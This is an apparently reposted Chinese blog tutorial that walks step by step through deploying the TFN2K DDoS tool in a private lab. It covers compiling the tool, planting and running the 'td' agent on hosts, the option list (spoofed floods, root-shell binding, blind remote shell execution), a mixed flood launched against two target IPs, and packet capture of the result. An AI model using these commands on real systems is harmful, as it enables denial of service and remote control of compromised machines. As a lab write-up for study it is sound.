软件TFN 2K的分布式拒绝攻击(DDos)实战详解

这篇具有很好参考价值的文章主要介绍了软件TFN 2K的分布式拒绝攻击(DDos)实战详解。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

写在前头


本人写这篇博客的目的,并不是我想成为黑客或者鼓励大家做损坏任何人安全和利益的事情。因科研需要,我学习软件TFN 2K的分布式拒绝攻击,只是分享自己的学习过程和经历,有助于大家更好的关注到网络安全及网络维护上。

需要强调的是,进行未经授权的网络攻击是非法的,违反了法律法规,可能导致刑事起诉和重大法律后果。

一定要尊重法律和道德,不要参与或支持任何网络攻击行为。如果你是网络管理员,应该采取适当的安全措施来保护你的网络免受DDoS攻击的影响。

这篇文章仅供技术参考,千万不要用其做一些违法操作!如果你利用它来做一些不合法的事情,那结果与我无关。

一. TFN 2K概述


什么是DDos

DDoS攻击(Distributed Denial of Service Attack),即分布式拒绝服务攻击。最简单的定义就是:多台电脑对一台电脑的攻击,占用目标服务器或网络资源的攻击行为

什么是TFN 2K

TFN 2K通过主控端利用大量代理端主机的资源进行对一个或多个目标进行协同攻击,是DDos的实现工具

攻击体系

主控端—运行TFN客户端,来遥控并指定攻击目标,更改攻击方法

代理端—被植入并运行TD进程的牺牲品,接受TFN的指挥,攻击的实施者

软件TFN 2K的分布式拒绝攻击(DDos)实战详解,网络安全,分布式,ddos,TNF2K,网络安全,分布式攻击

TFN 2K特性

  • 主控端通过随机TCPUDPICMP之一的数据包向代理端主机发送命令,攻击方法包括TCP/SYNUDPICMP/PING、混合攻击、TARGA3等。
  • 主控端与代理端的通讯采取单向,即主控端只向代理端发送命令,并且会采取随机的头信息,甚至虚拟的源地址信息,代理端不会逆向向主控端发送任何信息。

二. 安装配置


我在个人本地服务器上部署了几台设备,来模拟应用场景。网络拓扑如下,需实现Master控制两台Attacker攻击两台Defender

软件TFN 2K的分布式拒绝攻击(DDos)实战详解,网络安全,分布式,ddos,TNF2K,网络安全,分布式攻击

2.1 安装TFN


在主控端Master下载TFN 2K软件(因软件的特殊性,本人概不提供相关的下载渠道),设下载并解压的文件夹名称为TFN2K

切换至下载目录,对软件进行编译,同时设置一个八位数的登录密码

cd TFN2K/src
make

编译后即可生成tfntd
软件TFN 2K的分布式拒绝攻击(DDos)实战详解,网络安全,分布式,ddos,TNF2K,网络安全,分布式攻击
登录所有代理端,将主机端的td下载到代理端本地

scp root@192.166.60.1:/root/TFN2K/src/td ./
scp root@192.166.61.1:/root/TFN2K/src/td ./

td赋权,并执行文件,此时,代理端部署完毕

chmod 777 td
./td

可利用ps -a查看进程,发现td已经在运行了
软件TFN 2K的分布式拒绝攻击(DDos)实战详解,网络安全,分布式,ddos,TNF2K,网络安全,分布式攻击

2.2 TFN命令讲解


可在主控端输入./tfn查看相关参数

  • -P protocol:设置服务器通信的协议。可以是ICMPUDPTCP。使用随机协议作为默认值
  • -D n:为每个真实的请求发送n个虚假请求以诱骗目标
  • -S hostIp:可指定源ip。默认情况下随机欺骗
  • -f hostlist:存储TFN的所有主控端的文件名,表示其中所有主控端均实现攻击操作
  • -h hostname:只利用该主控端发起攻击,也就是一对一的攻击,后面跟一个主机或IP地址
  • -p port:为SYN洪泛指定TCP目标端口
  • -c ID:攻击参数
    • -c 0 :停止攻击
    • -c 1:设置反欺骗等级设定,用法:-i 0(完全欺骗)到-i 3(/24个主机字节欺骗)
    • -c 2:改变攻击数据包大小,用法:-i <packet size in bytes>
    • -c 3:将根shell绑定到一个指定的端口,用法:-i<remote port>
    • -c 4UDP洪水,用法:-i victim@victim2@victim3@...
    • -c 5TCP/SYN洪水,用法:-i victim@...[-p目标端口]
    • -c 6ICMP/PING洪水,用法:-i victim@...
    • -c 7ICMP/SMURF洪水,用法:-i victim@broadcast@broadcast2@...
    • -c 8MIX flood(随机UDP/TCP/ICMP攻击),用法:-i victim@...
    • -c 9TARGA3洪水(IP堆栈渗透),用法:-i victim@...
    • -c 10:盲目执行远程shell命令,使用-i命令,一般还可用于远程命令控制

2.3 测试TD


在实现泛洪攻击前,先对所有的代理端进行测试,测试其是否可“听从”主控端的安排

创建host.txt文件用于记录所有运行了./td文件的代理端

echo "192.166.60.2" > host.txt
echo "192.166.61.2" > host.txt

操作tfn向所有的代理端实现创建文件夹的命令,一般创建的文件夹都和td在同一级目录

./tfn -f /root/TFN2K/host.txt -c 10 -i "mkdir TestMakeDir"

查看代理端可知,文件夹创建成功,表明主控端可操作所有的代理端
软件TFN 2K的分布式拒绝攻击(DDos)实战详解,网络安全,分布式,ddos,TNF2K,网络安全,分布式攻击

三. 攻击


3.1 准备工作


先为被攻击服务器安装流量抓包软件,在DF1上安装tcpdump

apt install tcpdump

测试抓取15秒内的流量,并输出为文件形式

tcpdump -i eth1 -w "getFlow.pcap" -G 15

DF2上安装tshark

apt install tshark
# 倘若不能安装便先安装wireshark
apt install wireshark

测试抓取15秒内的流量,并输出为文件形式

tshark -i eth1 -a duration:15 -w "getFlow.pcap"

3.2 发送攻击


开启流量捕获,利用控制端Master向代理端发出攻击请求,利用MIX flood攻击DF1DF2

./tfn -f /root/TFN2K/host.txt -c 8 -i 192.166.65.1@192.166.66.1

15秒后停止流量攻击

./tfn -f /root/TFN2K/host.txt -c 0

3.3 查看结果


查看DF1中捕获的流量,发现存在大量UDPTCP数据流

tcpdump -r getFlow.pcap

软件TFN 2K的分布式拒绝攻击(DDos)实战详解,网络安全,分布式,ddos,TNF2K,网络安全,分布式攻击
因没有直接记录数据大小,可以通过ls -l查看文件大小间接来判断捕获的数据流,可知确实捕获了大量数据
软件TFN 2K的分布式拒绝攻击(DDos)实战详解,网络安全,分布式,ddos,TNF2K,网络安全,分布式攻击
查看DF2中捕获的流量,DF2中更直观,表明捕获了约75万个数据流

tshark -r getFlow.pcap

软件TFN 2K的分布式拒绝攻击(DDos)实战详解,网络安全,分布式,ddos,TNF2K,网络安全,分布式攻击
通过ls -l查看文件大小,可知确实捕获了大量数据
软件TFN 2K的分布式拒绝攻击(DDos)实战详解,网络安全,分布式,ddos,TNF2K,网络安全,分布式攻击

3.4 解惑


我们发送的是MIX flood,表示随机UDP/TCP/ICMP攻击,但是在捕获流量的文件中并没有查看到ICMP类型的流量,这是为什么呢?

通过我查阅资料可知:ICMP洪泛攻击现已经过时,不再有效,网络管理员和服务提供商已经采取了各种防护措施,包括用于过滤恶意流量的设备和防火墙规则,这些自带的防护措施可以检测到大量的ICMP流量,并在检测到异常或过多的流量时采取措施,以减轻对目标系统的影响。但UDPTCP攻击可能更难检测和阻止,因为它们模拟更常见的网络通信模式。文章来源地址https://www.toymoban.com/news/detail-725504.html

到了这里,关于软件TFN 2K的分布式拒绝攻击(DDos)实战详解的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 分布式软件架构——传输链路

    链路指无源的点到点的物理连接。链路是计算机网络中的一个重要概念,它指的是连接两个网络设备的物理或逻辑路径。简单来说,链路就是电信号或数据在网络中传输的路径。在计算机网络中,链路可以分为物理链路和逻辑链路两种。物理链路是指连接两个网络设备的物理

    2024年02月16日
    浏览(44)
  • 分布式软件架构——内容分发网络

    其基本思路是尽可能避开互联网上有可能影响数据传输速度和稳定性的瓶颈和环节,使内容传输得更快、更稳定。通过在网络各处放置节点服务器所构成的在现有的互联网基础之上的一层智能虚拟网络,CDN系统能够实时地根据网络流量和各节点的连接、负载状况以及到用户的

    2024年02月15日
    浏览(43)
  • 【软件开发】从单机到分布式

    问题:由于流量越来越大出现服务器性能问题。 对架构增加了一台服务器,应用和数据库分别部署到不同的服务器上,对于开发和测试没有任何影响,只需要应用服务器新增一个远程调用数据库服务器的连接,有效地缓解了应用服务器负载的压力。 问题:随着请求流量的进

    2024年02月02日
    浏览(109)
  • 【架构设计】单体软件分布式化思考

    单体软件是历史悠久的软件架构形态,以下是一个简单的前后端分离的单体架构的 web 软件。 单体软件采用分布式方案部署,是根据需求而定的。 为了满足不同场景下的需求,单体软件中的客户端、代理层、服务、数据库,都可以以多个副本联合起来,提供服务的方式部署,

    2024年01月18日
    浏览(56)
  • 分布式软件架构——客户端缓存

    当万维网刚刚出现的时候,浏览器的缓存机制差不多就已经存在了。在 HTTP 协议设计之初,人们便确定了服务端与客户端之间“无状态”(Stateless)的交互原则,即要求客户端的每次请求是独立的,每次请求无法感知、也不能依赖另一个请求的存在,这既简化了 HTTP 服务器的

    2024年02月12日
    浏览(43)
  • 分布式软件架构——服务端缓存的三种属性

    在透明多级分流系统中,我们以流量从客户端中发出开始,以流量到达服务器集群中真正处理业务的节点结束。一起探索了在这个过程中与业务无关的一些通用组件,包括DNS、CDN、客户端缓存,等等。 实际上,服务端缓存也是一种通用的技术组件,它主要用于减少多个客户端

    2024年02月07日
    浏览(54)
  • 【软件开发】大规模分布式系统的容错架构设计

    假设有一个数据库,数据库里有一张特别大的表,里面有几十亿,甚至上百亿的数据。更进一步说,假设这一张表的数据量多达几十个 TB,甚至上百个 TB,那么如果用 MySQL 之类的数据库,单台数据库服务器上的磁盘可能都不够放这一张表的数据! 假如你手头有一个超大的数

    2024年02月04日
    浏览(51)
  • 四大软件架构:掌握单体、分布式、微服务、Serverless 的精髓

    简介: 如果一个软件开发人员,不了解软件架构的演进,会制约技术的选型和开发人员的生存、晋升空间。这里我列举了目前主要的四种软件架构以及他们的优缺点,希望能够帮助软件开发人员拓展知识面。 单体架构比较初级,典型的三级架构,前端(Web/手机端)+中间业务逻

    2024年01月17日
    浏览(44)
  • 理解分布式存储的真实成本 - 10PB的硬件和软件

    我们最近与一家大型银行的首席信息官进行了一次对话。他们是全球系统性重要银行之一——规模极其庞大。这位CIO决定将MinIO引入为数据分析计划的对象存储。这个部署从抵押贷款、交易和新闻平台收集数据,以运行Spark和其他分析工具,为银行提供洞察力。MinIO所取代的实

    2024年01月25日
    浏览(39)
  • Linux分布式应用 Zabbix监控软件实例:监控NGINX的性能

        测试 访问设置的网站 获取NGINX状态统计 过滤结果获取需要的值     服务器端验证     ​​​创建模板 点击左边菜单栏【配置】中的【模板】,点击【创建模板】 【模板名称】设置成 Template NGINX Status 【可见的名称】设置成 Template NGINX Status 【群组】选择 Template 【描述

    2024年02月15日
    浏览(50)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包